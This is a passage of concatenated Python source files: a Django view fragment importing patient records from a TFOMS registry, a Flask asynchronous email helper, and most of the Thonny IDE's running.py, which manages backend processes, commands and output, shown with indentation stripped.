Individual.import_from_tfoms(from_tfoms, no_update=True)
if not has_tfoms_data:
Individual.import_from_tfoms(
{
"enp": polis,
"family": request_data['family'],
"given": request_data['name'],
"patronymic": request_data['patronymic'],
"gender": request_data['sex'],
"birthdate": request_data['bdate'],
},
no_update=True,
)
return JsonResponse({"ok": True})
def is_l2_card(request):
request_data = json.loads(request.body)
card = Card.objects.filter(number=request_data['number'], base__internal_type=True).first()
if card:
return JsonResponse({"ok": True, "individual_fio": card.individual.fio()})
else:
return JsonResponse({"ok": False})
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['MONSTER_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['MONSTER_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
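# Illustrative usage (the template name and address are assumptions):
#   send_email('user@example.com', 'Welcome!', 'email/welcome', user=user)
# renders email/welcome.txt and email/welcome.html with `user` in the template context
# and delivers the message from a background thread, returning that thread.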
|
running.py
|
# -*- coding: utf-8 -*-
"""Code for maintaining the background process and for running
user programs
Commands get executed via shell, this way the command line in the
shell becomes kind of title for the execution.
"""
import collections
import logging
import os.path
import re
import shlex
import signal
import subprocess
import sys
import time
import tkinter as tk
import warnings
from logging import debug
from threading import Thread
from time import sleep
from tkinter import messagebox, ttk
from typing import Any, List, Optional, Set # @UnusedImport; @UnusedImport
from thonny import THONNY_USER_DIR, common, get_runner, get_shell, get_workbench
from thonny.common import (
BackendEvent,
CommandToBackend,
DebuggerCommand,
DebuggerResponse,
EOFCommand,
InlineCommand,
InputSubmission,
ToplevelCommand,
ToplevelResponse,
UserError,
is_same_path,
normpath_with_actual_case,
parse_message,
path_startswith,
serialize_message,
update_system_path,
MessageFromBackend,
universal_relpath,
)
from thonny.editors import (
get_current_breakpoints,
get_saved_current_script_filename,
is_remote_path,
is_local_path,
get_target_dirname_from_editor_filename,
extract_target_path,
)
from thonny.languages import tr
from thonny.misc_utils import construct_cmd_line, running_on_mac_os, running_on_windows
from thonny.ui_utils import CommonDialogEx, select_sequence, show_dialog
WINDOWS_EXE = "python.exe"
OUTPUT_MERGE_THRESHOLD = 1000
RUN_COMMAND_LABEL = "" # init later when gettext is ready
RUN_COMMAND_CAPTION = ""
EDITOR_CONTENT_TOKEN = "$EDITOR_CONTENT"
EXPECTED_TERMINATION_CODE = 123
INTERRUPT_SEQUENCE = "<Control-c>"
ANSI_CODE_TERMINATOR = re.compile("[@-~]")
# other components may turn it on in order to avoid grouping output lines into one event
io_animation_required = False
_console_allocated = False
class Runner:
def __init__(self) -> None:
get_workbench().set_default("run.auto_cd", True)
self._init_commands()
self._state = "starting"
self._proxy = None # type: BackendProxy
self._publishing_events = False
self._polling_after_id = None
self._postponed_commands = [] # type: List[CommandToBackend]
def _remove_obsolete_jedi_copies(self) -> None:
# Thonny 2.1 used to copy jedi in order to make it available
# for the backend. Get rid of it now
for item in os.listdir(THONNY_USER_DIR):
if item.startswith("jedi_0."):
import shutil
shutil.rmtree(os.path.join(THONNY_USER_DIR, item), True)
def start(self) -> None:
global _console_allocated
try:
self._check_alloc_console()
_console_allocated = True
except Exception:
logging.getLogger("thonny").exception("Problem allocating console")
_console_allocated = False
self.restart_backend(False, True)
# temporary
self._remove_obsolete_jedi_copies()
def _init_commands(self) -> None:
global RUN_COMMAND_CAPTION, RUN_COMMAND_LABEL
RUN_COMMAND_LABEL = tr("Run current script")
RUN_COMMAND_CAPTION = tr("Run")
get_workbench().set_default("run.run_in_terminal_python_repl", False)
get_workbench().set_default("run.run_in_terminal_keep_open", True)
try:
import thonny.plugins.debugger # @UnusedImport
debugger_available = True
except ImportError:
debugger_available = False
get_workbench().add_command(
"run_current_script",
"run",
RUN_COMMAND_LABEL,
caption=RUN_COMMAND_CAPTION,
handler=self.cmd_run_current_script,
default_sequence="<F5>",
extra_sequences=[select_sequence("<Control-r>", "<Command-r>")],
tester=self.cmd_run_current_script_enabled,
group=10,
image="run-current-script",
include_in_toolbar=not (get_workbench().in_simple_mode() and debugger_available),
show_extra_sequences=True,
)
get_workbench().add_command(
"run_current_script_in_terminal",
"run",
tr("Run current script in terminal"),
caption="RunT",
handler=self._cmd_run_current_script_in_terminal,
default_sequence="<Control-t>",
extra_sequences=["<<CtrlTInText>>"],
tester=self._cmd_run_current_script_in_terminal_enabled,
group=35,
image="terminal",
)
get_workbench().add_command(
"restart",
"run",
tr("Stop/Restart backend"),
caption=tr("Stop"),
handler=self.cmd_stop_restart,
default_sequence="<Control-F2>",
group=100,
image="stop",
include_in_toolbar=True,
)
get_workbench().add_command(
"interrupt",
"run",
tr("Interrupt execution"),
handler=self._cmd_interrupt,
tester=self._cmd_interrupt_enabled,
default_sequence=INTERRUPT_SEQUENCE,
skip_sequence_binding=True, # Sequence will be bound differently
group=100,
bell_when_denied=False,
)
get_workbench().bind(INTERRUPT_SEQUENCE, self._cmd_interrupt_with_shortcut, True)
get_workbench().add_command(
"ctrld",
"run",
tr("Send EOF / Soft reboot"),
self.ctrld,
self.ctrld_enabled,
group=100,
default_sequence="<Control-d>",
extra_sequences=["<<CtrlDInText>>"],
)
get_workbench().add_command(
"disconnect",
"run",
tr("Disconnect"),
self.disconnect,
self.disconnect_enabled,
group=100,
)
def get_state(self) -> str:
"""State is one of "running", "waiting_debugger_command", "waiting_toplevel_command" """
return self._state
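    # State transitions, as implemented below: sending a ToplevelCommand or DebuggerCommand
    # puts the runner into "running"; a ToplevelResponse from the backend moves it to
    # "waiting_toplevel_command" and a DebuggerResponse to "waiting_debugger_command";
    # other messages leave the state unchanged.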
def _set_state(self, state: str) -> None:
if self._state != state:
logging.debug("Runner state changed: %s ==> %s" % (self._state, state))
self._state = state
def is_running(self):
return self._state == "running"
def is_waiting(self):
return self._state.startswith("waiting")
def is_waiting_toplevel_command(self):
return self._state == "waiting_toplevel_command"
def is_waiting_debugger_command(self):
return self._state == "waiting_debugger_command"
def get_sys_path(self) -> List[str]:
return self._proxy.get_sys_path()
def send_command(self, cmd: CommandToBackend) -> None:
if self._proxy is None:
return
if self._publishing_events:
# allow all event handlers to complete before sending the commands
# issued by first event handlers
self._postpone_command(cmd)
return
# First sanity check
if (
isinstance(cmd, ToplevelCommand)
and not self.is_waiting_toplevel_command()
and cmd.name not in ["Reset", "Run", "Debug"]
or isinstance(cmd, DebuggerCommand)
and not self.is_waiting_debugger_command()
):
get_workbench().bell()
logging.warning(
"RUNNER: Command %s was attempted at state %s" % (cmd, self.get_state())
)
return
# Attach extra info
if "debug" in cmd.name.lower():
cmd["breakpoints"] = get_current_breakpoints()
if "id" not in cmd:
cmd["id"] = generate_command_id()
cmd["local_cwd"] = get_workbench().get_local_cwd()
# Offer the command
logging.debug("RUNNER Sending: %s, %s", cmd.name, cmd)
response = self._proxy.send_command(cmd)
if response == "discard":
return None
elif response == "postpone":
self._postpone_command(cmd)
return
else:
assert response is None
get_workbench().event_generate("CommandAccepted", command=cmd)
if isinstance(cmd, (ToplevelCommand, DebuggerCommand)):
self._set_state("running")
if cmd.name[0].isupper():
get_workbench().event_generate("BackendRestart", full=False)
def send_command_and_wait(self, cmd: CommandToBackend, dialog_title: str) -> MessageFromBackend:
self.send_command(cmd)
dlg = BlockingDialog(get_workbench(), cmd, title=dialog_title + " ...")
show_dialog(dlg)
return dlg.response
def _postpone_command(self, cmd: CommandToBackend) -> None:
# in case of InlineCommands, discard older same type command
if isinstance(cmd, InlineCommand):
for older_cmd in self._postponed_commands:
if older_cmd.name == cmd.name:
self._postponed_commands.remove(older_cmd)
if len(self._postponed_commands) > 10:
logging.warning("Can't pile up too many commands. This command will be just ignored")
else:
self._postponed_commands.append(cmd)
def _send_postponed_commands(self) -> None:
todo = self._postponed_commands
self._postponed_commands = []
for cmd in todo:
logging.debug("Sending postponed command: %s", cmd)
self.send_command(cmd)
def send_program_input(self, data: str) -> None:
assert self.is_running()
self._proxy.send_program_input(data)
def execute_script(
self,
script_path: str,
args: List[str],
working_directory: Optional[str] = None,
command_name: str = "Run",
) -> None:
if self._proxy.get_cwd() != working_directory:
# create compound command
# start with %cd
cd_cmd_line = construct_cd_command(working_directory) + "\n"
else:
# create simple command
cd_cmd_line = ""
rel_filename = universal_relpath(script_path, working_directory)
cmd_parts = ["%" + command_name, rel_filename] + args
exe_cmd_line = construct_cmd_line(cmd_parts, [EDITOR_CONTENT_TOKEN]) + "\n"
# submit to shell (shell will execute it)
get_shell().submit_magic_command(cd_cmd_line + exe_cmd_line)
def execute_editor_content(self, command_name, args):
get_shell().submit_magic_command(
construct_cmd_line(
["%" + command_name, "-c", EDITOR_CONTENT_TOKEN] + args, [EDITOR_CONTENT_TOKEN]
)
)
def execute_current(self, command_name: str) -> None:
"""
This method's job is to create a command for running/debugging
current file/script and submit it to shell
"""
if not self.is_waiting_toplevel_command():
self.restart_backend(True, False, 2)
filename = get_saved_current_script_filename()
if not filename:
# user has cancelled file saving
return
if (
is_remote_path(filename)
and not self._proxy.can_run_remote_files()
or is_local_path(filename)
and not self._proxy.can_run_local_files()
):
self.execute_editor_content(command_name, self._get_active_arguments())
else:
if get_workbench().get_option("run.auto_cd") and command_name[0].isupper():
working_directory = get_target_dirname_from_editor_filename(filename)
else:
working_directory = self._proxy.get_cwd()
if is_local_path(filename):
target_path = filename
else:
target_path = extract_target_path(filename)
self.execute_script(
target_path, self._get_active_arguments(), working_directory, command_name
)
def _get_active_arguments(self):
if get_workbench().get_option("view.show_program_arguments"):
args_str = get_workbench().get_option("run.program_arguments")
get_workbench().log_program_arguments_string(args_str)
return shlex.split(args_str)
else:
return []
def cmd_run_current_script_enabled(self) -> bool:
return (
get_workbench().get_editor_notebook().get_current_editor() is not None
and "run" in get_runner().get_supported_features()
)
def _cmd_run_current_script_in_terminal_enabled(self) -> bool:
return (
self._proxy
and "run_in_terminal" in self._proxy.get_supported_features()
and self.cmd_run_current_script_enabled()
)
def cmd_run_current_script(self) -> None:
if get_workbench().in_simple_mode():
get_workbench().hide_view("VariablesView")
self.execute_current("Run")
def _cmd_run_current_script_in_terminal(self) -> None:
filename = get_saved_current_script_filename()
self._proxy.run_script_in_terminal(
filename,
self._get_active_arguments(),
get_workbench().get_option("run.run_in_terminal_python_repl"),
get_workbench().get_option("run.run_in_terminal_keep_open"),
)
def _cmd_interrupt(self) -> None:
if self._proxy is not None:
if _console_allocated:
self._proxy.interrupt()
else:
messagebox.showerror(
"No console",
"Can't interrupt as console was not allocated.\n\nUse Stop/Restart instead.",
)
else:
logging.warning("User tried interrupting without proxy")
def _cmd_interrupt_with_shortcut(self, event=None):
if not self._cmd_interrupt_enabled():
return None
if not running_on_mac_os(): # on Mac Ctrl+C is not used for Copy.
# Disable Ctrl+C interrupt in editor and shell, when some text is selected
# (assuming user intended to copy instead of interrupting)
widget = get_workbench().focus_get()
if isinstance(widget, tk.Text):
if len(widget.tag_ranges("sel")) > 0:
# this test is reliable, unlike selection_get below
return None
elif isinstance(widget, (tk.Listbox, ttk.Entry, tk.Entry, tk.Spinbox)):
try:
selection = widget.selection_get()
if isinstance(selection, str) and len(selection) > 0:
# Assuming user meant to copy, not interrupt
# (IDLE seems to follow same logic)
# NB! This is not perfect, as in Linux the selection can be in another app
# ie. there may be no selection in Thonny actually.
# In other words, Ctrl+C interrupt may be dropped without reason
# when given inside the widgets listed above.
return None
except Exception:
# widget either doesn't have selection_get or it
# gave error (can happen without selection on Ubuntu)
pass
self._cmd_interrupt()
return "break"
def _cmd_interrupt_enabled(self) -> bool:
return self._proxy and self._proxy.is_connected()
def cmd_stop_restart(self) -> None:
if get_workbench().in_simple_mode():
get_workbench().hide_view("VariablesView")
self.restart_backend(True)
def disconnect(self):
proxy = self.get_backend_proxy()
assert hasattr(proxy, "disconnect")
proxy.disconnect()
def disconnect_enabled(self):
return hasattr(self.get_backend_proxy(), "disconnect")
def ctrld(self):
proxy = self.get_backend_proxy()
if not proxy:
return
if get_shell().has_pending_input():
messagebox.showerror(
"Can't perform this action",
"Ctrl+D only has effect on an empty line / prompt.\n"
+ "Submit current input (press ENTER) and try again",
)
return
proxy.send_command(EOFCommand())
self._set_state("running")
def ctrld_enabled(self):
proxy = self.get_backend_proxy()
return proxy and proxy.is_connected()
def _poll_backend_messages(self) -> None:
"""I chose polling instead of event_generate in listener thread,
because event_generate across threads is not reliable
http://www.thecodingforums.com/threads/more-on-tk-event_generate-and-threads.359615/
"""
self._polling_after_id = None
if self._pull_backend_messages() is False:
return
self._polling_after_id = get_workbench().after(20, self._poll_backend_messages)
def _pull_backend_messages(self):
while self._proxy is not None:
try:
msg = self._proxy.fetch_next_message()
if not msg:
break
logging.debug(
"RUNNER GOT: %s, %s in state: %s", msg.event_type, msg, self.get_state()
)
except BackendTerminatedError as exc:
self._report_backend_crash(exc)
self.destroy_backend()
return False
if msg.get("SystemExit", False):
self.restart_backend(True)
return False
# change state
if isinstance(msg, ToplevelResponse):
self._set_state("waiting_toplevel_command")
elif isinstance(msg, DebuggerResponse):
self._set_state("waiting_debugger_command")
else:
"other messages don't affect the state"
# Publish the event
# NB! This may cause another command to be sent before we get to postponed commands.
try:
self._publishing_events = True
class_event_type = type(msg).__name__
get_workbench().event_generate(class_event_type, event=msg) # more general event
if msg.event_type != class_event_type:
# more specific event
get_workbench().event_generate(msg.event_type, event=msg)
finally:
self._publishing_events = False
# TODO: is it necessary???
# https://stackoverflow.com/a/13520271/261181
# get_workbench().update()
self._send_postponed_commands()
def _report_backend_crash(self, exc: Exception) -> None:
returncode = getattr(exc, "returncode", "?")
err = "Backend terminated or disconnected."
try:
faults_file = os.path.join(THONNY_USER_DIR, "backend_faults.log")
if os.path.exists(faults_file):
with open(faults_file, encoding="ASCII") as fp:
err += fp.read()
except Exception:
logging.exception("Failed retrieving backend faults")
err = err.strip() + " Use 'Stop/Restart' to restart.\n"
if returncode != EXPECTED_TERMINATION_CODE:
get_workbench().event_generate("ProgramOutput", stream_name="stderr", data="\n" + err)
get_workbench().become_active_window(False)
def restart_backend(self, clean: bool, first: bool = False, wait: float = 0) -> None:
"""Recreate (or replace) backend proxy / backend process."""
if not first:
get_shell().restart()
get_shell().update_idletasks()
self.destroy_backend()
backend_name = get_workbench().get_option("run.backend_name")
if backend_name not in get_workbench().get_backends():
raise UserError(
"Can't find backend '{}'. Please select another backend from options".format(
backend_name
)
)
backend_class = get_workbench().get_backends()[backend_name].proxy_class
self._set_state("running")
self._proxy = None
self._proxy = backend_class(clean)
self._poll_backend_messages()
if wait:
start_time = time.time()
while not self.is_waiting_toplevel_command() and time.time() - start_time <= wait:
# self._pull_backend_messages()
get_workbench().update()
sleep(0.01)
get_workbench().event_generate("BackendRestart", full=True)
def destroy_backend(self) -> None:
if self._polling_after_id is not None:
get_workbench().after_cancel(self._polling_after_id)
self._polling_after_id = None
self._postponed_commands = []
if self._proxy:
self._proxy.destroy()
self._proxy = None
get_workbench().event_generate("BackendTerminated")
def get_local_executable(self) -> Optional[str]:
if self._proxy is None:
return None
else:
return self._proxy.get_local_executable()
def get_backend_proxy(self) -> "BackendProxy":
return self._proxy
def _check_alloc_console(self) -> None:
if sys.executable.endswith("pythonw.exe"):
# These don't have console allocated.
# Console is required for sending interrupts.
# AllocConsole would be easier but flashes console window
import ctypes
kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
exe = sys.executable.replace("pythonw.exe", "python.exe")
cmd = [exe, "-c", "print('Hi!'); input()"]
child = subprocess.Popen(
cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
child.stdout.readline()
result = kernel32.AttachConsole(child.pid)
if not result:
err = ctypes.get_last_error()
logging.info("Could not allocate console. Error code: " + str(err))
child.stdin.write(b"\n")
try:
child.stdin.flush()
except Exception:
# May happen eg. when installation path has "&" in it
# See https://bitbucket.org/plas/thonny/issues/508/cant-allocate-windows-console-when
# Without flush the console window becomes visible, but Thonny can be still used
logging.getLogger("thonny").exception("Problem with finalizing console allocation")
def ready_for_remote_file_operations(self, show_message=False):
if not self._proxy or not self.supports_remote_files():
return False
ready = self._proxy.ready_for_remote_file_operations()
if not ready and show_message:
if self._proxy.is_connected():
msg = "Device is not connected"
else:
                msg = (
                    "Device is busy -- can't perform this action now."
                    + "\nPlease wait or cancel current work and try again!"
                )
messagebox.showerror("Can't complete", msg)
return ready
def get_supported_features(self) -> Set[str]:
if self._proxy is None:
return set()
else:
return self._proxy.get_supported_features()
def supports_remote_files(self):
if self._proxy is None:
return False
else:
return self._proxy.supports_remote_files()
def supports_remote_directories(self):
if self._proxy is None:
return False
else:
return self._proxy.supports_remote_directories()
def get_node_label(self):
if self._proxy is None:
return "Back-end"
else:
return self._proxy.get_node_label()
def using_venv(self) -> bool:
from thonny.plugins.cpython import CPythonProxy
return isinstance(self._proxy, CPythonProxy) and self._proxy._in_venv
class BackendProxy:
"""Communicates with backend process.
All communication methods must be non-blocking,
ie. suitable for calling from GUI thread."""
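    # A minimal sketch of a concrete proxy (illustrative; "EchoProxy" is a hypothetical
    # name, not part of Thonny). The Runner polls fetch_next_message() from the GUI
    # thread, so messages must be queued internally and handed out without blocking:
    #
    #   class EchoProxy(BackendProxy):
    #       def __init__(self, clean):
    #           super().__init__(clean)
    #           self._queue = collections.deque()
    #           # a ToplevelResponse carrying "welcome_text" marks the backend as ready
    #           self._queue.append(ToplevelResponse(welcome_text="echo backend"))
    #       def send_command(self, cmd):
    #           self._queue.append(BackendEvent("ProgramOutput", data=str(cmd) + "\n", stream_name="stdout"))
    #           return None  # accepted
    #       def fetch_next_message(self):
    #           return self._queue.popleft() if self._queue else None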
# backend_name will be overwritten on Workbench.add_backend
# Subclasses don't need to worry about it.
backend_name = None
def __init__(self, clean: bool) -> None:
"""Initializes (or starts the initialization of) the backend process.
Backend is considered ready when the runner gets a ToplevelResponse
with attribute "welcome_text" from fetch_next_message.
"""
def send_command(self, cmd: CommandToBackend) -> Optional[str]:
"""Send the command to backend. Return None, 'discard' or 'postpone'"""
raise NotImplementedError()
def send_program_input(self, data: str) -> None:
"""Send input data to backend"""
raise NotImplementedError()
def fetch_next_message(self):
"""Read next message from the queue or None if queue is empty"""
raise NotImplementedError()
def run_script_in_terminal(self, script_path, args, interactive, keep_open):
raise NotImplementedError()
def get_sys_path(self):
"backend's sys.path"
return []
def get_backend_name(self):
return type(self).backend_name
def get_pip_gui_class(self):
return None
def interrupt(self):
"""Tries to interrupt current command without reseting the backend"""
pass
def destroy(self):
"""Called when Thonny no longer needs this instance
(Thonny gets closed or new backend gets selected)
"""
pass
def is_connected(self):
return True
def get_local_executable(self):
"""Return system command for invoking current interpreter"""
return None
def get_supported_features(self):
return {"run"}
def get_node_label(self):
"""Used as files caption if back-end has separate files"""
return "Back-end"
def get_full_label(self):
"""Used in pip GUI title"""
return self.get_node_label()
def supports_remote_files(self):
"""Whether remote file browser should be presented with this back-end"""
return False
def uses_local_filesystem(self):
"""Whether it runs code from local files"""
return True
def supports_remote_directories(self):
return False
def supports_trash(self):
return True
def can_run_remote_files(self):
raise NotImplementedError()
def can_run_local_files(self):
raise NotImplementedError()
def ready_for_remote_file_operations(self):
return False
def get_cwd(self):
return None
class SubprocessProxy(BackendProxy):
def __init__(self, clean: bool, executable: Optional[str] = None) -> None:
super().__init__(clean)
if executable:
self._executable = executable
else:
self._executable = get_interpreter_for_subprocess()
self._welcome_text = ""
self._proc = None
self._response_queue = None
self._sys_path = []
self._usersitepackages = None
self._gui_update_loop_id = None
self._in_venv = None
self._cwd = self._get_initial_cwd() # pylint: disable=assignment-from-none
self._start_background_process(clean=clean)
def _get_initial_cwd(self):
return None
    def _start_background_process(self, clean=None, extra_args=None):
        if extra_args is None:
            extra_args = []
        # deque, because in one occasion I need to put messages back
        self._response_queue = collections.deque()
# prepare environment
env = get_environment_for_python_subprocess(self._executable)
# variables controlling communication with the back-end process
env["PYTHONIOENCODING"] = "utf-8"
# because cmd line option -u won't reach child processes
# see https://github.com/thonny/thonny/issues/808
env["PYTHONUNBUFFERED"] = "1"
# Let back-end know about plug-ins
env["THONNY_USER_DIR"] = THONNY_USER_DIR
env["THONNY_FRONTEND_SYS_PATH"] = repr(sys.path)
env["THONNY_LANGUAGE"] = get_workbench().get_option("general.language")
env["FRIENDLY_TRACEBACK_LEVEL"] = str(
get_workbench().get_option("assistance.friendly_traceback_level")
)
if get_workbench().in_debug_mode():
env["THONNY_DEBUG"] = "1"
elif "THONNY_DEBUG" in env:
del env["THONNY_DEBUG"]
if not os.path.exists(self._executable):
raise UserError(
"Interpreter (%s) not found. Please recheck corresponding option!"
% self._executable
)
cmd_line = (
[
self._executable,
"-u", # unbuffered IO
"-B", # don't write pyo/pyc files
# (to avoid problems when using different Python versions without write permissions)
]
+ self._get_launcher_with_args()
+ extra_args
)
creationflags = 0
if running_on_windows():
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
debug("Starting the backend: %s %s", cmd_line, get_workbench().get_local_cwd())
extra_params = {}
if sys.version_info >= (3, 6):
extra_params["encoding"] = "utf-8"
self._proc = subprocess.Popen(
cmd_line,
bufsize=0,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=self._get_launch_cwd(),
env=env,
universal_newlines=True,
creationflags=creationflags,
**extra_params
)
# setup asynchronous output listeners
Thread(target=self._listen_stdout, args=(self._proc.stdout,), daemon=True).start()
Thread(target=self._listen_stderr, args=(self._proc.stderr,), daemon=True).start()
def _get_launch_cwd(self):
return self.get_cwd() if self.uses_local_filesystem() else None
def _get_launcher_with_args(self):
raise NotImplementedError()
def send_command(self, cmd: CommandToBackend) -> Optional[str]:
"""Send the command to backend. Return None, 'discard' or 'postpone'"""
if isinstance(cmd, ToplevelCommand) and cmd.name[0].isupper():
self._clear_environment()
if isinstance(cmd, ToplevelCommand):
# required by SshCPythonBackend for creating fresh target process
cmd["expected_cwd"] = self._cwd
method_name = "_cmd_" + cmd.name
if hasattr(self, method_name):
getattr(self, method_name)(cmd)
else:
self._send_msg(cmd)
def _send_msg(self, msg):
self._proc.stdin.write(serialize_message(msg) + "\n")
self._proc.stdin.flush()
def _clear_environment(self):
pass
def send_program_input(self, data):
self._send_msg(InputSubmission(data))
def process_is_alive(self):
return self._proc is not None and self._proc.poll() is None
def is_terminated(self):
return not self.process_is_alive()
def is_connected(self):
return self.process_is_alive()
def get_sys_path(self):
return self._sys_path
def interrupt(self):
if self._proc is not None and self._proc.poll() is None:
if running_on_windows():
try:
os.kill(self._proc.pid, signal.CTRL_BREAK_EVENT) # pylint: disable=no-member
except Exception:
logging.exception("Could not interrupt backend process")
else:
self._proc.send_signal(signal.SIGINT)
def destroy(self):
self._close_backend()
def _close_backend(self):
if self._proc is not None and self._proc.poll() is None:
self._proc.kill()
self._proc = None
self._response_queue = None
def _listen_stdout(self, stdout):
# debug("... started listening to stdout")
# will be called from separate thread
message_queue = self._response_queue
def publish_as_msg(data):
msg = parse_message(data)
if "cwd" in msg:
                self._cwd = msg["cwd"]
message_queue.append(msg)
if len(message_queue) > 50:
# Probably backend runs an infinite/long print loop.
                # Throttle message throughput in order to keep GUI thread responsive.
while len(message_queue) > 0:
sleep(0.1)
while self.process_is_alive():
try:
data = stdout.readline()
except IOError:
sleep(0.1)
continue
# debug("... read some stdout data", repr(data))
if data == "":
break
else:
try:
publish_as_msg(data)
except Exception:
# Can mean the line was from subprocess,
# which can't be captured by stream faking.
# NB! If subprocess printed it without linebreak,
# then the suffix can be thonny message
parts = data.rsplit(common.MESSAGE_MARKER, maxsplit=1)
# print first part as it is
message_queue.append(
BackendEvent("ProgramOutput", data=parts[0], stream_name="stdout")
)
if len(parts) == 2:
second_part = common.MESSAGE_MARKER + parts[1]
try:
publish_as_msg(second_part)
except Exception:
# just print ...
message_queue.append(
BackendEvent(
"ProgramOutput", data=second_part, stream_name="stdout"
)
)
def _listen_stderr(self, stderr):
# stderr is used only for debugger debugging
while self.process_is_alive():
data = stderr.readline()
if data == "":
break
else:
self._response_queue.append(
BackendEvent("ProgramOutput", stream_name="stderr", data=data)
)
def _store_state_info(self, msg):
if "cwd" in msg:
self._cwd = msg["cwd"]
self._publish_cwd(msg["cwd"])
if msg.get("welcome_text"):
self._welcome_text = msg["welcome_text"]
if "in_venv" in msg:
self._in_venv = msg["in_venv"]
if "sys_path" in msg:
self._sys_path = msg["sys_path"]
if "usersitepackages" in msg:
self._usersitepackages = msg["usersitepackages"]
if "prefix" in msg:
self._sys_prefix = msg["prefix"]
if "exe_dirs" in msg:
self._exe_dirs = msg["exe_dirs"]
if msg.get("executable"):
self._reported_executable = msg["executable"]
def _publish_cwd(self, cwd):
if self.uses_local_filesystem():
get_workbench().set_local_cwd(cwd)
def get_supported_features(self):
return {"run"}
def get_site_packages(self):
# NB! site.sitepackages may not be present in virtualenv
for d in self._sys_path:
if ("site-packages" in d or "dist-packages" in d) and path_startswith(
d, self._sys_prefix
):
return d
return None
def get_user_site_packages(self):
return self._usersitepackages
def get_cwd(self):
return self._cwd
def get_exe_dirs(self):
return self._exe_dirs
def fetch_next_message(self):
if not self._response_queue or len(self._response_queue) == 0:
if self.is_terminated():
raise BackendTerminatedError(self._proc.returncode if self._proc else None)
else:
return None
msg = self._response_queue.popleft()
self._store_state_info(msg)
if not hasattr(msg, "event_type"):
print("gotww", msg)
if msg.event_type == "ProgramOutput":
# combine available small output messages to one single message,
# in order to put less pressure on UI code
wait_time = 0.01
total_wait_time = 0
while True:
if len(self._response_queue) == 0:
if _ends_with_incomplete_ansi_code(msg["data"]) and total_wait_time < 0.1:
# Allow reader to send the remaining part
sleep(wait_time)
total_wait_time += wait_time
continue
else:
return msg
else:
next_msg = self._response_queue.popleft()
if (
next_msg.event_type == "ProgramOutput"
and next_msg["stream_name"] == msg["stream_name"]
and (
len(msg["data"]) + len(next_msg["data"]) <= OUTPUT_MERGE_THRESHOLD
and ("\n" not in msg["data"] or not io_animation_required)
or _ends_with_incomplete_ansi_code(msg["data"])
)
):
msg["data"] += next_msg["data"]
else:
# not to be sent in the same block, put it back
self._response_queue.appendleft(next_msg)
return msg
else:
return msg
def _ends_with_incomplete_ansi_code(data):
pos = data.rfind("\033")
if pos == -1:
return False
# note ANSI_CODE_TERMINATOR also includes [
params_and_terminator = data[pos + 2 :]
return not ANSI_CODE_TERMINATOR.search(params_and_terminator)
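# Illustrative behaviour of the check above:
#   _ends_with_incomplete_ansi_code("x \x1b[3")   -> True   (no final byte in [@-~] yet)
#   _ends_with_incomplete_ansi_code("x \x1b[31m") -> False  ('m' terminates the sequence)
#   _ends_with_incomplete_ansi_code("plain")      -> False  (no ESC character at all)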
def is_bundled_python(executable):
return os.path.exists(os.path.join(os.path.dirname(executable), "thonny_python.ini"))
def create_backend_python_process(
args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
"""Used for running helper commands (eg. pip) on CPython backend.
Assumes current backend is CPython."""
# TODO: if backend == frontend, then delegate to create_frontend_python_process
python_exe = get_runner().get_local_executable()
env = get_environment_for_python_subprocess(python_exe)
env["PYTHONIOENCODING"] = "utf-8"
env["PYTHONUNBUFFERED"] = "1"
# TODO: remove frontend python from path and add backend python to it
return _create_python_process(python_exe, args, stdin, stdout, stderr, env=env)
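# Illustrative call (the arguments are assumptions):
#   create_backend_python_process(["-m", "pip", "list", "--format", "json"])
# returns a Popen for the backend interpreter with stderr merged into stdout by default;
# the full command line is kept on the returned object as proc.cmd.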
def create_frontend_python_process(
args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
):
"""Used for running helper commands (eg. for installing plug-ins on by the plug-ins)"""
if _console_allocated:
python_exe = get_interpreter_for_subprocess().replace("pythonw.exe", "python.exe")
else:
python_exe = get_interpreter_for_subprocess().replace("python.exe", "pythonw.exe")
env = get_environment_for_python_subprocess(python_exe)
env["PYTHONIOENCODING"] = "utf-8"
env["PYTHONUNBUFFERED"] = "1"
return _create_python_process(python_exe, args, stdin, stdout, stderr)
def _create_python_process(
python_exe,
args,
stdin=None,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=False,
env=None,
universal_newlines=True,
):
cmd = [python_exe] + args
if running_on_windows():
creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
else:
startupinfo = None
creationflags = 0
proc = subprocess.Popen(
cmd,
stdin=stdin,
stdout=stdout,
stderr=stderr,
shell=shell,
env=env,
universal_newlines=universal_newlines,
startupinfo=startupinfo,
creationflags=creationflags,
)
proc.cmd = cmd
return proc
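# Raised by fetch_next_message() once the backend process has exited;
# carries the process return code when it is known.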
class BackendTerminatedError(Exception):
def __init__(self, returncode=None):
Exception.__init__(self)
self.returncode = returncode
def is_venv_interpreter_of_current_interpreter(executable):
    for location in [".", ".."]:
        cfg_path = os.path.join(os.path.dirname(executable), location, "pyvenv.cfg")
if os.path.isfile(cfg_path):
with open(cfg_path) as fp:
content = fp.read()
for line in content.splitlines():
if line.replace(" ", "").startswith("home="):
_, home = line.split("=", maxsplit=1)
home = home.strip()
if os.path.isdir(home) and os.path.samefile(home, sys.prefix):
return True
return False
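# The two helpers below compute environment overrides for a target interpreter
# and apply them on top of a copy of os.environ (a value of None removes the key).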
def get_environment_for_python_subprocess(target_executable):
overrides = get_environment_overrides_for_python_subprocess(target_executable)
return get_environment_with_overrides(overrides)
def get_environment_with_overrides(overrides):
env = os.environ.copy()
for key in overrides:
if overrides[key] is None and key in env:
